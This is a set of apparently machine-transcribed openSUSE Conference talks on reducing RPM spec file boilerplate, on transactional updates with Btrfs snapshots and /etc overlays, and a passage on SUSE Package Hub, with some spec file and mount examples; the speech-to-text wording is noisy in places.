It's a bit more complicated. And for the long-term things, what we want to do is having templates within the spec files that can be maintained centrally. So you can remove some of the boilerplate stuff and have it in central location that does things. There are basically two tools, direction suites. One is this is something to have templates for building. So you have for different languages, prepared build templates that you can use. That's still very vague. In my mind, the question here is what can be centralized, how many configurations do you need and what can actually be saved in complexity or if you need so much in the opposite, it's not worth doing. But we will look into this in more detail. Another thing is building sub-packages is currently kind of a pain. The thing that's currently most complicated is debug packages and it's solved currently by some code somewhere in RPM that basically does them in C code, which is not that beautiful. But there are a lot of other use cases where right now those sub-packages have to be done by hand. But I will also go into details. So what we currently have, if you do an update, you have to create a patch somehow. You have to add it to the spec file. You have to pick a patch number, find out which is the next suitable. Then you have to apply that in prep using the number above. You have to increase the release. You have to add and change log entry. You have to use the release number you just increased from above. You have to add your name and email. Then you have to commit this. I don't know what you do in SUSE. Where do you store your spec files? Do you have...? You have to get into a great VCS in the build service. So you put them somewhere else. I have a macro, so we don't need to remember the patch number in front. That one mod that doesn't match is totally everybody does. It's auto-set up. Auto-set up. Auto-set up. Auto-set up. Auto-set up. Auto-set up. Auto-set up. Auto-set up. Auto-set up. Auto-set up. I just want to say it, that's your own app. The app is for self-accompaniment. About self-accompaniment. It's something we just showed you, you have something and get it also. So it's a lot of steps. Yeah, we already removed this step here with auto-set up. The next release will allow you to not set a number. So we will auto-number the patches, which makes sense if you use auto-set up because who cares what number the patch has? This is more interesting for us because we have different branches for different releases, so we might want to cherry pick stuff from one branch to another, and this is the total nightmare because there's nothing in here that doesn't give a conflict. Literally. So I will try to look if we can get rid of the change lock by basically generating that from the Git backlog and probably also calculate the release number from the Git by just counting up so that we'll reduce the number of things that can go wrong or be wrong. It also will basically remove all those things that create a merge conflict for us because you basically just put in the patch, the patch adds one line up here, and if it's a conflict that's not that bad, it's just one line somewhere in the moment that might be in the wrong order who cares. You put it in there and then the commit message stays the same and it just does everything else. 
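Just to picture the spec file side of that in a condensed form, and keeping in mind that the automatic patch numbering is only coming with the next release: the idea is that the top of a spec file can eventually look roughly like this (package and patch names are made up):

    Name:     example
    Version:  1.0
    Release:  1%{?dist}
    Source0:  example-1.0.tar.gz
    # No patch numbers needed anymore once auto-numbering lands:
    Patch:    fix-build.patch
    Patch:    fix-crash.patch

    %prep
    # %autosetup unpacks the source and applies all patches in order
    %autosetup -p1

Now, back to the changelog and the release number side of it.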
That's something I want to look into Fedora that will probably take a while till it gets to the point where it's interesting for you guys, but this will probably be some kind of white paper how to do that or what can be done there. So I will probably have a look at that. So I will probably have a look at that. So even with the external cloud, we're still copying the OBS VCO, so it's still in two places, so they have the same problem anyway. Yes, but it's pre-given, so you commit and you get the whole text already pasted into it. Yeah, or you could commit without having to change the file and have those entries in there and pull it from there. Depends. Yeah, I know. Yeah, but... It has a lot of history to the whole process. Yes. Will you make this work with this source? Will you make this work with this source? On? I wrote it this source. Well, the stuff that is in our... As we do within RPM will, of course, be upstream RPM, the other stuff, the problem is that's all basically build system or logic, so it depends on the integration in the build system or the way you store your spec file. So that's... Maybe talking about the patch thingy in the CropFile recording. Yeah, the autosetup stuff is done already and the patch number stuff is going to be the next release. But that's more or less done. We just have to release it. If you want to make it work, you can have it also for different branches. You need to back call it, you know, 29 to 28 to 37... Yeah, we will see how... It'll happen. They didn't like thinking about it. The thing is, the thing is, you're probably... No, the e-bar will make it work. So first, now I don't say anything about what we're doing well, but we can talk about Fedora and with so far been hesitant back porting too many stuff back, we'll see. But that's a topic for another rainy day. That's basically what we're trying to do here. So, the main thing is that it will require build system integration. You will be able to do that also on the command line, of course. So you have to expect that you build my fail on missing build dependencies, even though you already installed all of them that you had in your source app here. So that's basically a main change that is in there. The other thing is, as a packageer, you can probably outsource generating the build dependencies from your package. And it will be... That's one section less that can go wrong if the package has changed. I assume there will be tools for the typical candidates like Rust. Igor is working on that. He's hiding in the background. Yeah, so that's on your doorstep. And I hear the Go people are also interested in using this. The thing is, that's how it's going to start. I can imagine that on the long term, even classical packages may be using this. I mean, it's not that great if you want to get the requirements out of a configure file. But CMake, maybe. Everyone can even convince upstream to basically ship a machine-readable file of dependencies. At some point, if we downstream are able to actually process that and make something useful with it. So I see there's more thing that is more impacted as can have on the long term, but it will probably take a while until all the tooling gets in place and then it actually gets adopted. So another thing when we're looking on the packages, but I've been thinking about packages, is there is a weird conflict about who's actually controlling what in the RPM land. 
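For the curious, the shape of such a dynamic build dependency section is deliberately simple: it is a script that runs after %prep, and every dependency it prints to standard output is treated like an additional BuildRequires. What you actually call in there depends on the language ecosystem; the helper below is purely made up:

    %generate_buildrequires
    # Inspect the unpacked sources and print one dependency per line
    # (illustrative helper, not a real tool).
    ./print-build-deps.sh

The build then stops so that the newly found dependencies can be installed, and is restarted afterwards, which is exactly the extra round mentioned above.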
So there's, of course, things that are RPM upstream that we do, and then they are implemented and everyone else has to follow because if we change something, yeah, we changed it. Then there is, of course, a package which has most control over the package itself. And there's a very weird in-between layer of the distribution that has very little control right now. And so it's very difficult to actually centralize stuff out of the packages and bring that in a place where people think about a bigger picture. So we've tried to do that with the file triggers to be able to get the striplets to a central place, but I think in the long term we need to think about more, if there are more places where we can centralize things. And currently that's really difficult because there's no implementation level. Well there's, and I know in open Susan, but in Fedora we have huge amounts of packaging guidelines. Pages, over pages, over pages, over pages. How things are to be done, how they to be named, how they should look like, what you can't and couldn't do, what we shouldn't do, what you might do if you ask someone or what else. The worst thing about all those guidelines is, yeah, there's a package review, but if your package is in, no one cares, so there are all those rules that may or may not be followed and there's no way to actually put them into the world as an entity on their own. And so I hope that we can find ways to, for one, help the package doing the right thing. And on the other hand, giving the distribution or parts of the distributions more control over a set of packages of their interest. I first thought if we can do something on a distribution level, but I think that's not possible. The reason why there's so much control on the package level is because the packages are so different. And that's one of the reasons why RPM is so hard and so complicated because we have to cover basically every possible situation that might be somewhere. And there's no way to fit them all under one solution. But there are a lot of packages that look a lot the same, all the Python packages, all the font packages, all the language packages. So there are a lot of packages that belong together, either by the way they are built or what they contain or how they are related to. And so I think we need to focus if we can find solutions and that allow those packages to be maintained in a more controlled way with a more centralized approach. But that's going to be tricky because those structures don't really exist because there's no point in me having a script saying, well, that's what Python packages should look like. You need basically a group within a distribution that actually takes care of this. This extends to RPM to some extent that we also have a lot of the tools that we already have upstream is our things that we don't really maintain well because we don't know and we don't care, really. So there are all kinds of those dependency generators for different languages and I'm fine. I know Python. I can look at the Python dependency generator and make some sense of it. Then there is a go dependency generator and I have no idea how that's even supposed to work and there are all those other languages. And so we've tried the last year or two, but not succeeded much. We've basically pushed them out and basically hand them over as a separate project that are maintained by different people that actually care about how those packages look like. 
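Just to make "dependency generator" a bit less abstract: such a generator is hooked into RPM through a small file attribute definition plus a helper script, roughly of this shape. Everything here, names and paths, is purely illustrative:

    # /usr/lib/rpm/fileattrs/example.attr (hypothetical)
    # For every packaged file ending in .example, run the helper to
    # compute automatic Requires and Provides:
    %__example_requires   %{_rpmconfigdir}/exampledeps.sh --requires
    %__example_provides   %{_rpmconfigdir}/exampledeps.sh --provides
    %__example_path       \\.example$

The helper gets the matching file names on standard input and prints dependencies on standard output, and that helper is the part that really needs domain knowledge about the language in question.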
So I invite everyone, if you're taking care of some of those groups of larger packages, talk to us if you want to get involved. So we can basically hand those adjacent areas over to people that actually care because RPM upstream can't really get involved into all those ever-scrolling number of package families that have special needs and need special care. And one of the things that we want to look into from our feature-wise is how to make this easier and how to offer solutions to those groups that can be actually done. Yeah, you can write macros and RPM, but that's all kind of ugly right now. So it's probably some things can be done if you really want to, but you run into issues very quickly. So if you want to basically, if you want to ship those macros as separate files and automatically set dependencies on those stuff. So there's probably a lot of smaller feature that we will look into over the next year to see if we can make this easier. And one of the goals to centralize those boilerplate code, it's not that interesting, but at least get it done. I've looked at eBuild, which does something very similar to this, those interest groups we need to get in contact with. And the idea is of course to, this will be of course optional, so we are not going to remove the other stuff, but that means on the other hand packages actually will need to be moved more or less by hand or by script to just all new options. One way this could solve is if you put those scripts or templates into separate versions for different releases, you could get rid of all those if lines that litter a lot of our packages. And I hear that's even worse in open source, not pointing fingers, but if you have centralized scripts that are used there, you can have different versions for different releases that does do the right thing without the package even knowing the difference. Hopefully. The other thing is dealing with subpackages. The problem with subpackages in RPM right now is the overall attitude that RPM has in spec files. The spec file right now basically is a consistency check for the software packages. So you have the file list and the file list is there to type in every file to make sure that if there are some file pops up that doesn't belong there, it creates an error and you as a package are supposed to look up what went wrong and fix the list or whatever. And the same thing is also true for subpackages. So as soon as something goes wrong there, you will get an error and the package will not build. And I think we might be able to basically just loosen those rules or be able to loosen those rules basically by a switch to be able to have template packages that will build if everything is right. So you can basically have a double template that will be used and it will swallow all those files that look the right way. So all the include files, we will just move there if there are some. And the behavior will be if there are no files to be included because it's not done see package but some documentation package. Those package will just not be built without generating an error. So you have those templates you can use and it will fail graciously and not bother you. I have some ideas how to do that but it's still brewing in my mind how to do this in detail. In the end it's a question of philosophy, how much convenience you want for the package and how much control you want to bind down how the package actually should work. 
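Just to picture what that manual boilerplate looks like today: a classical, hand-written devel subpackage is roughly this block, repeated in thousands of spec files (names are generic):

    %package devel
    Summary:   Development files for example
    Requires:  %{name} = %{version}-%{release}

    %description devel
    Header files and libraries for developing against example.

    %files devel
    %{_includedir}/example/
    %{_libdir}/libexample.so

That is the kind of block a devel template could one day generate for you, and simply skip if no matching files exist.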
There is the possibility of course to use the build templates from above to actually include those templates so you could have so that even those sub packages get basically generated automatically and you could have like distribution level includes that would determine what level of sub packages are actually built for those packages that using this. So you could say well we want all the non binary files split out in a separate package. So we would only have the binary stuff in the package and everything else gets a lip no source RPM or something like this. Or you would be able to split out all language files and basically explode every application into like 50 language sub packages and you could switch this on and off basically without even touching the package. So that's basically yeah one interesting thing is how to what to do with files and there is a couple of mechanisms that we would need there like some sub package stealing files from another and or if so the problem is right now files are more or less taken care of very carefully but if you want to enable switch on and sub package you of course have to move the files over there without generating an error in the other package that may list them still. So there's a couple of there so we will need some syntax that will allow to do that without generating errors. And we will also need something to basically append packages that's something that's currently not possible so you cannot have like a second file list for to add files to a package that may be coming from a template. So if you have a double package you might have those other files you want in there too so you will add something like this. So that's the things we're I'm thinking at night. I'm thinking about at night questions comments scared faces. I do have I do have RPM merge for the best comments. Yeah please. My main right is always when the introduction of macros on new features in Tamarind. For us it's very easy to have backport packages and I really hate that you then have to do if conditioners and spec files. So that's why I was asking if you can make it that you can easily backport those features so backporting like rebuilding up here on the order this was still works fine. Yes. The question was about backporting and how can we make it easier to make those new features and new macros to actually work on all the releases that are built from the same spec file and to avoid all the if release version something. So in Fedora what's this to some degree by having actually different get branches so they're not they're not building from the same file. But they're not everyone is willing to split up the spec file into actually different versions so we basically get the same thing. Backporting features is kind of difficult. There's basically I mean there's just there's no magic here. There are two ways to do that. Either you update RPM in the old version that's something a lot of people feel very uncomfortable with and the other thing is basically backporting the single patches which is something we have done but we are trying to avoid in because there's of course a lot of work and may break stuff anyway. But there's no real solution for this. The real solution is not to have too many different versions. Or the other thing what we've actually done in the past is delay the usage of those features for release or two. So you basically try and drain out the old RPM versions that can support it and only use it later on. So we have been waiting 15 years. 
The thing is we've done that in the past but not for this reason. I think we have successfully broken that in the past because that made life really really hard. Yeah. We can no longer do that. So we're trying to keep up and be faster and that's a good thing. But it balances out. So being slow sometimes has benefits, being fast sometimes has benefits faster. At least from the macro's perspective one of the things that we did for Fedora was if they're just macros that run in the macro engine we just join them and put them into another package and then just force them into the builder for all the older releases. So that works for us for like 90% of feature backboards. When it comes to like they change the way RPM builds works. Yeah. So like I was one you said oh yeah then you don't have numbers anymore and the patch lines and they don't cost conflicts anymore. But that's something that can be done outside of RPM so you don't actually, yeah the missing numbers not really. You have a pre-processed. Yeah. Yeah. That would be a possibility. Yes. Yeah. The comment for me this looks a lot of magic. It scares me. Yeah. Because for me. Why are you scared? Because for me explicit is better than impulsive. So for example my question is you have generate build request. Bring it offline like they have some like C++ which figures out build request for you. But what does it bring to do with a macro and not bring it beforehand before comment. Once you see a macro the other I see the build request for me as a reviewer I read thousands of spec files it's easy to see the difference for example. You might introduce a new build request and I might not know it. Well the main reason so the question was this looks like a lot of magic and why not generate the build request previously in another step. And one of the reason is that we first you need the infrastructure to do the other step. The second thing is those new languages basically yeah you could previously but it's kind of part of the build process actually. So there came they come prepackaged with the information inside and basically using this during the build process makes it harder for us to actually go wrong or break. So it's basically you could do it outside but you need to have all the stuff wrapped around. So you can actually put in the package you can actually have the process of extracting those dependencies as part of the package. Yeah our PM is our PM is all a tooling problem. So we are not hiding them. So this is a comment to that. Yes. by you, we take from this git, we create a source package, source package gets passed to mock, mock runs DNF build depth which extracts those installs, those build depths, then runs RPM build against that. RPM build bombs out with another source package, which then runs DNF build depth against that, creates a new churud that runs the build a second time, and then runs through that, and then that's the final build. Oh my god. Except for the top, except for the top, there is only one that's still soft-haired. Well, at the end of the day, there'll be a final source package, but there's intermediary, no source package, that's created as part of this thing. So the thing is, it's actually, the way it's implemented in RPM, it's actually meant to restart the build, and you can actually restart the build even from the extracted prep from the extracted sources if you want to. So the turnaround in there is very small if you do it properly. 
So it basically just creates a header with the dependencies in it, and you basically install those into the existing build route and then restart the build. That's all you need to do. Builds have no network. You need to lock, well, you need to. If you copy the RPM to invent, start to VM and DVM only gets the RPM, but it has pre-resolved. So there's no external interaction. There's no secondary resolution process at all. Yeah, that's what will be interesting. I know. So I've been talking to Michael Schroeder and he said. We know the dependencies I can import. I know. That's all one of build service. I know. It's going to be underwatch. We will see that. I've been talking to Michael Schroeder and he said, he thinks he can do it somehow. But. Michael's also died. Yeah. So who am I to question? Have a good day. Have a bad day. Yeah. I'm not repeating that. So I have a pretty simple question. Me as a freelancer, a Java programmer, who working for many clients who are using the Red Hat Enterprise Linux. And sometimes I need to make a package for them. The package can be deployed on their system. So can you describe the proper way how to package a Java simple application? What is the case? There's no such thing as Red Hat. There's a very simple answer. And the answer is no. I need to specify what kind of virtual machine. Yeah, we have people that do Java packaging. That they're not me. Is there any in the communication for the Red Hat Enterprise Linux? Docs.fadoraproject.org. There's a packaging guidelines page. The Java stuff applies to all Red Hat family distributions. Yeah. As we say, we have a lot of packaging guidelines. The problem is probably not that there are too little guidelines. The problem is rather than there are too many. Well, they mostly like season 2. I was just going to say, I was talking to my manager. He said we are now using file triggers in all sorts of places. That's not for libraries. And because we maintain a bunch of the base system, that means everyone else can see the features. OK. Thank you. We are not there yet, but we won't take three years of argument in June to see people. What does the camera ask? So any other questions? Maybe a bit out of the box. I don't remember the name of the guys, but you expect there was this group of former R&B developers that built a package manager that used Python inheritance. So you could have base package Python extended by a page. Oh, they're already gone. I think we're going to be sent to the car. That was the package manager. I like that concept, because basically you normally have to describe the changes between what a thing and what the kind of thing is doing. I know out here there's miles away from that, but I like the thinking. And maybe want to do some really hanky things, like I don't know, using Ginge on the internet and spec files or to simulate some of that. You're getting very close to some of the things that other people are doing right now. So I've not looked at Connery, but that's clearly something I will look into. Can someone? I'm just existing on the C8, Baltimore company. Because all the girls still don't want to help. Yeah. So can someone? I'm kind of chained here. Yeah, I feel OK. I'm not just. OK. Any other questions? Remarks? A very, very stupid one. Why does RPM insist on expanding commented out macros? That's a good question. And that's easy to answer, because there are no comments in RPM. Oh, god. That's not a good answer. Yeah, no. That's actually an answer. 
The thing is, if you have a hash, that's an comment within a shell. That's part of the shell thing. And RPM is completely oblivious of the fact that you thought you would comment something out. That's something we actually looked into like a half a year ago. And I don't know if you did something about it. But it's something. You're going to add a source of pain. I think we added a warning for that. I'm not one. I'm going to add an error to get master, so that if it's a multi-line macro that is on a comment line, it will blow up instead of letting you do something. Yeah, something like this. Yeah. But that's a get master, which means it will be coming out sometime in the future. No. We're doing an alpha release next week. Wait, what? Wait, you're going to actually do a release? Yeah. That's a plan. Or just get my constraint if you put that patch in. Yeah, that too. But then when having a get like the parts of it, they're around. I have some pump packages which are pigeon-wide because of micro-resolution and sort of sort of plan is to do an alpha release next week and refine that through the next Fedora release cycle, which ends in October or something, November, I think. Yeah, the appendages sent out the chain proposal for RPM-415. So you're free to grab the alpha release as soon as it's out. I mean, maybe later we go two before you push it. I'm not back on the right hand side. Yeah, but of course, yeah, feel free to play around with it. I mean, yeah, we will typically Fedora takes most of the heat of getting the really fresh stuff. But there's really no reason why other people shouldn't try and feel a bit of the pain. Yeah, but setting by patches on RPM makes very hard to test in versions. Yeah, but even if you don't put in a distribution right away, you can play around with it. Yeah, I've been checking whether. I've been thinking about it before. Like that, then free cost of micro-solution, then if you have four variables, then it's getting funded that get one from the stack hour. Can you just open a ticket for with some test guys? Because the micro engine, we have Pavlina, which has looked into the micro engine. I for years have basically refused to even look at it because it's scary on the outside. And maybe it's scary on the inside. How would I know? No. But. So yeah, there's probably still stuff that can be fixed, even if it's code that's 20 years old. When can we get Ellen? I will probably just. Where is a patch? I will probably just merge it as soon as I get back from the conference. Thank God. Thank you. Thank you. Thank you. It's an epic, over like years. And don't get me started. OK, any other questions? I think we're done here. Thank you.
Right now many RPM spec files contain large parts of boiler plate code. In the current development cycle of RPM we try to help reducing this clutter. We hope we can make packaging easier by providing means to have pre-arranged building blocks and offer more control over larger sets of packages. This will also change the relation between RPM as a multipurpose tool and the single package/packager by adding a layer in between take will take care of common tasks. This talk will give a overview of the changes already done and still planned and will allow for discussion and feed back.
10.5446/54425 (DOI)
I'm a research engineer at SUSE and I'm the maintainer of transactional-update. So maybe some of you have heard, watched or visited last year's talk at the openSUSE Conference. So, does anybody know what transactional updates are? Some of you? Okay. So this is an introduction for the rest of you, and then I'll talk about the news, the new developments since last year's talk. As a research engineer, of course, one of my jobs is to also compare with other products. And we've seen that Windows is one of those more popular products, and we tried to see what the essentials are that make Windows popular. We've seen that one of those core essences of Windows is: it has to reboot constantly. So we thought, let's also do that on Linux. You don't seem too convinced. So yeah, we really tried to do that. But let's look at the real reasons. With regular updates, we currently have a combination of snapper and zypper, which operate on a Btrfs file system if you're doing a default installation of openSUSE. What actually happens is: you get a new snapshot of your currently running system, then the system is actually updated, and then you get a post snapshot with the new state after the installation. So you can roll back if anything breaks after the installation or at the start of your system. So that's a good mechanism already, but you have one problem: that update runs in the currently running system. So if anything breaks during the update, you have actually destroyed your current system, and you have to do a rollback to your previous snapshot, but your system is down for that time. So let's try to improve that. There are several distributions, not only openSUSE, providing transactional updates or atomic updates, which all share this definition of a transactional update: a transactional update has to be atomic, so, as I just said, it has to either be fully applied or not applied at all. And the update must not influence your currently running system; you don't want to have services restarted during the update, or whatever else would happen during an update. The second criterion: the update can be rolled back. That's what we already have with our current snapper and zypper implementation, so that's nothing we have to take care of with transactional updates. So what's actually different with transactional updates? We still have our currently running system, which that huge red arrow is pointing at, and whenever you are doing an update or any modification done by your package management software, a package installation or whatever, you'll get a new snapshot. And the update will then run in that new snapshot. So if you type transactional-update dup, transactional-update up, or transactional-update pkg in whatever, you get those updates installed into that new snapshot, and the current system doesn't even know about that. So it just continues running and running and running. And as soon as you think, oh, the update should now be applied, then you can actually reboot your system. That's the reboot trigger. Why is that? Because a reboot is an atomic thing: you have the guarantee that no process is running anymore when your system is rebooted. And you can safely boot into that new snapshot then. How is that actually done? Btrfs knows a default snapshot. So if the update was successful, the new, in this case green, snapshot will be set as the new default snapshot, and GRUB will just boot the default Btrfs snapshot. So that's actually what it is.
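In practice, the whole workflow boils down to something like this, run as root (a rough sketch, using the commands provided by the transactional-update package):

    # Create a new snapshot and perform the distribution upgrade inside it,
    # without touching the currently running system:
    transactional-update dup

    # Later, whenever it suits you, activate the new snapshot:
    reboot

Until that reboot, the running system keeps using the old snapshot, and if the update failed, the new snapshot simply never becomes the default.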
If you want to try transactional-update and haven't done it yet, you have a huge chance now if you're using Leap 15.0, because the update to Leap 15.1 may be one of those cases with major changes to the system where things may actually break. So you can just install transactional-update, and it will do the update in the background. You can just ensure everything is going smoothly without destroying your currently running system. And if everything goes smoothly, you can just reboot and you're in the new system. That's one use case you can use it for. However, there's one caveat: in that case, you would do that on a read-write file system. If you use transactional updates on a read-only file system, I'll tell you about the implications in a few seconds. So let's have a look at the second part, what's new since last year. First of all, we still have our /var directory. /var is not part of the root file system, so that means it's also not part of the actual update. If packages try to modify /var, you would get changes to your currently running system, which is not what is intended to be done by a transactional update. So that's still the case: we won't mount, not even bind mount, /var into the update. If you are a package maintainer, you may have received a bug ticket from us in case you did actually modify files in /var; those packages would have been incompatible with transactional-update. And in the last year, we tried to resolve all the remaining packages where /var modifications were still done in some post script or whatever. Currently we know about, meanwhile, less than 30 packages which are still doing modifications to /var. Some of them can't be solved easily because it's an architectural problem. But I think 30 packages out of 12,000 is a quite good ratio. So transactional-update should be considered stable. If we missed something, please tell us. There's an easy way to tell whether an update actually did something it was not supposed to do, namely: transactional-update will now print out the files at the end of the update which would be overmounted. So let's assume a change to /var was done: it will print out the corresponding file which was changed in /var. The same if a file was modified in your home directory or whatever. You'll get a list of those conflicting files which will not be seen in the running system afterwards. The second thing is /etc handling. You may remember, if you heard the talk or if you're an active user: on a read-only root file system, which we usually have with transactional updates, namely in MicroOS, in Kubic, or if you use the transactional server role in openSUSE, in Tumbleweed and Leap, /etc is mounted as an overlay file system. Why is that? You still want to modify your configuration files. Those overlays are stored in /var/lib/overlay. And the new thing, since several months: each snapshot gets one separate overlay, or one new overlay. You may remember that all the snapshots shared one common overlay, which obviously caused problems when trying to roll back, because you then got a mix of old and new configuration files in all snapshots, so we improved that. One interesting thing about those overlays is that they are stacked. So if you apply a new update, you'll get that new overlay for the snapshot, which is transparent, and you'll see all the lower layers. I'll show you what that actually means. That's the entry for the /etc mount.
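Shortened and reformatted a bit for readability (the real line is a single long entry, and the exact directory names may differ slightly), such an /etc overlay entry looks roughly like this:

    overlay  /etc  overlay  defaults,
      upperdir=/sysroot/var/lib/overlay/18/etc,
      lowerdir=/sysroot/var/lib/overlay/16/etc:/sysroot/var/lib/overlay/12/etc:...:/sysroot/etc,
      workdir=/sysroot/var/lib/overlay/18/work-etc  0  0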
And you can see several things here. Obviously we're currently in snapshot number 18, which is the upper dir, shown in red. And we have several lower dirs: we had snapshots 16, 12, 10, 8, 7, 6, and we have /sysroot/etc as the last entry. And you just accumulate changes in those overlays. So if you did something, let's say, in overlay number 10, and you didn't override or change that file again in a newer overlay, the file will be taken from overlay number 10. So, as I said, it's just transparent. If you go down the stack, if you go up the stack, or if you roll back to a previous snapshot, the /etc will only contain changes up until, let's say, snapshot number 12, so newer changes won't be visible. Of course, we don't want our stack to grow infinitely, so what we actually did is implement a cleanup algorithm. Snapper will occasionally clean up your old snapshots; if a snapshot is not available anymore, you obviously also don't need the overlay for it anymore. So the overlays will be synced down into the corresponding snapshot, but be aware that the state of /etc in the snapshot alone is not consistent, or doesn't represent anything; only the combination of the /etc of the snapshot and the overlays stacked on top of each other gives the actual contents of /etc. Yeah, we have a few other things. Oliver contributed kexec as a reboot method. We also have support for kured as a reboot daemon now. If you want to use telemetry, you can use Intel's telemetrics. And, new, we also have documentation now: it's the transactional-update guide, which can be found in the Kubic wiki; that's the link to the transactional-update guide, or that's also a link if you want to use the presentation to click on it directly. Another thing that was requested at last year's OSC was to get an option to influence the behavior of the zypper run. So we had interactive and non-interactive commands. By default, for example, if you type dup, which is supposed to be automatic, you always get it in non-interactive mode. And now you can just append the corresponding parameter if you think the default is not what you actually want, or if you want to resolve problems manually. If you just want to roll back to a previous good snapshot, you can just type transactional-update rollback last now. And we support needs-restarting now; it's a framework for indicating whether the system needs a reboot. If an application is using that, transactional-update will now indicate the correct state. So, as I said, you have the perfect opportunity to test transactional-update now with the update from Leap 15.0 to 15.1. If you're interested in the /etc and /var behavior, or let's say the /etc behavior, there's a very interesting talk tomorrow by Thorsten Kukuk, where the challenges which the /etc handling has will be discussed, especially considering the handling or the resetting of states. And we had several talks during this year's conference already: some of them are the openSUSE MicroOS talk and the openSUSE MicroOS desktop talk by Richard, and the talk just before this one about openSUSE Kubic, where you can see transactional-update in use on those systems. So that's it, basically. You can find us on kubic.opensuse.org; transactional-update is a part of the Kubic project. Or you can find us on IRC, the link is below. So I have, I guess, one minute left, don't I? Any questions? Yes? Do transactional updates increase the security of the system? The question was whether transactional updates increase the security of the system.
Yes, when combined with the read-only root file system, because then you have the read-only root file system where the data can't be changed easily. Transactional update is the only supported update mechanism on read-only root file systems; you can't update them without interfering deeply with the system anyway. So yes, it's not transactional-update itself, but the mechanisms behind it. Yeah? So what I was wondering about last year: let's say you want to change the role of a system via Salt. That's usually a combination of configuration changes and package changes, and usually you're planning to apply them together. Do those configuration changes already end up in the right /etc or whatever? Or do we basically have to make sure the packages are installed first via transactional-update and only then apply the configuration? The question is about Salt in combination with configuration: is it possible to combine configuration changes and package changes at the same time? No, because Salt doesn't know about transactional updates, so it can't install packages in a correct way. If you are just changing configuration files, that's no problem at all, because configuration is dynamic — if Salt is only changing them, it can update the configuration. But yes, Salt currently doesn't know about installing packages in a transactional-update context, if you are not doing it manually, of course. So that's not possible directly. Does that answer your question? Yes — no, we have to fix it. We should fix it, yes, that's correct. Let's discuss that offline. Okay, so that's it from me, basically. Now that we have successfully implemented Windows' reboot methods, let's start with blue screens next. And thanks — that's my talk. Thank you.
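For readers who want to try the workflow described in this talk, here is a minimal command sketch. It assumes an openSUSE Leap 15.0 system with the transactional-update package available and the repositories already pointed at the new release; treat the exact invocations as illustrative rather than authoritative.

    # Install the tool on a regular (read-write) Leap system
    sudo zypper install transactional-update

    # Run the distribution upgrade inside a new snapshot; the running system
    # is left untouched until the next reboot
    sudo transactional-update dup

    # Activate the new snapshot
    sudo reboot

    # If something is wrong after the reboot, return to the last known-good snapshot
    sudo transactional-update rollback last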
You may have heard about transactional updates already - that thing that will force you to reboot your system just like on Windows. Well, it still does, but it also provides a huge benefit compared to your regular updates: It won't break your currently running system. transactional-update is the default update mechanism on openSUSE Kubic and when using the "Transactional Server" role in openSUSE Leap or Tumbleweed. This talk is intended for both existing users and newcomers and will feature the following contents: - Give an overview of the design - Highlight the most important changes since last year, including the all-new _/etc_ handling - Give a general overview of the file system layout
10.5446/54427 (DOI)
Hello and welcome. Today I'm talking about SUSE Package Hub. So, who of you already knows what SUSE Package Hub is, or is using SUSE Package Hub? Probably more than half of the people here. So I'm just explaining what Package Hub is — it will be a little bit shorter than usual — but I also want to give you some background on how Package Hub evolved and why it was created. So if you imagine, this was basically the situation, or the reason Package Hub was created: back in time, around SLES 12, SLES came with a lot of supported packages, but there were still some packages missing for some customers. So we received requests from customers to add more packages, even without support, so they could just use them for convenience. Another reason was that we received requests from customers saying it's very hard to find official packages for SLES besides the packages that come with SLES. This is an old screenshot, so it looks different today. If you search for packages on software.opensuse.org or in the OBS, the Open Build Service, you will find many projects. For example, if you search for tmux, you find several projects with packages not only for Leap but also for SLES 12, 15 and so on. So you can just use those packages, but in an enterprise environment it's sometimes very difficult for customers to just use packages that come from some source that they basically don't really trust. And you never know if a project is going down or if it's going to be deleted, and then you're sitting there with your version of the package. So that's why we created Package Hub. It's basically another project in the Open Build Service that hosts the packages that come with Leap, and it's easier to access. The easiest way for the customers is always to use one source of truth: YaST and the SUSE Customer Center are basically the door to additional modules, extensions and additional software. That's the view SLES customers have. So we had to put this project into the SUSE Customer Center so that it's available through YaST in an easy way. So, talking about packages, it all started with just a few packages. That means we received, for example, requests from customers who wanted to have the KDE Plasma 5 packages in there. So this is SLES 12 around that time. The number of packages is not really that accurate, but just to give you an idea where we started: this is basically SLES 12 with around 2,500 packages, plus or minus some hundreds, that a customer gets when he installs SLES. Compared to openSUSE Leap at that time, a few more packages were available for free. And of course, Factory is way ahead with over 10,000 packages. I'm talking about source packages, because for binary packages the number is a lot higher. So we started adding the KDE Plasma 5 packages, which were around 400 packages or something like that, and some more packages. And that's basically what Package Hub was in the past, during the SLES 12 time frame. The OBS — I think you're all familiar with the OBS, so I will just go through it very quickly. It was the only option for us to use, because SLES itself is basically built in the build service, so we just used it and created an additional project. But for customers, as I said, it's not that easy to use; if you're a developer or a packager, it's basically your source of truth.
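As a rough illustration of the customer-facing path mentioned above (YaST and the SUSE Customer Center): on a registered SLES system, Package Hub is typically enabled with SUSEConnect or through YaST. The exact product identifier below — version and architecture — is an assumption and depends on the installed service pack, so check the extension list first.

    # List the available modules and extensions, then enable Package Hub
    SUSEConnect --list-extensions
    SUSEConnect --product PackageHub/15.1/x86_64

    # Afterwards, community packages can be installed with zypper as usual
    zypper install tmux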
There is a lot of confusion about Package Hub versus Backports. Who of you knows the difference? One guy. So that's why I'm explaining it here, because you always have to remember that from a customer perspective it's basically the right-hand side. As I mentioned, the view is through YaST or the SUSE Customer Center, and there we named it Package Hub. But the project itself is hosted in the Open Build Service, and back in time the project wasn't named Package Hub — it was just named Backports, because the packages were backported from the Leap version. So, yeah, you need to understand that when you're talking about Backports, that's the project inside the OBS, and when you're talking about Package Hub, it's basically the SUSE Customer Center view onto the Backports project. And of course, you can access the packages inside OBS directly; that's also one option. It is quite hard to add a few more hundred packages while giving support — SUSE has a limited number of employees. So all the packages are without support, basically. But the great thing about it is that every package that's built in the OBS for Package Hub is tested. Basically, rpmlint checks are run to make sure the package doesn't conflict with any package that comes with SLE. That means no files are replaced or overwritten by that package. If that would happen, rpmlint just throws an error and shows: hey, this package has a conflict with a package that comes with SLE. So this is a mechanism to make sure that every package on Package Hub doesn't conflict with any package on SLE, and it doesn't break the supportability. So if the customer has any problems with other packages on SLE, it doesn't break the support. That can be different if the customer just randomly installs packages from other sources — the system would then be really hard for SUSE to support. Okay, what's the current status? I already showed you how it was from a package perspective, the number of packages that we added to Package Hub back during the SLES 12 time frame. Today it looks quite different, because we have also followed a different approach. During SLES 12, we took all the packages that we put into Package Hub from Factory. Every package had to go through Factory — probably some of you know the statement "Factory first" — to make sure that the package got reviewed, and then we could pull it in. But for Package Hub for SLES 15, we are doing it slightly differently, because we want to make sure that we align as much 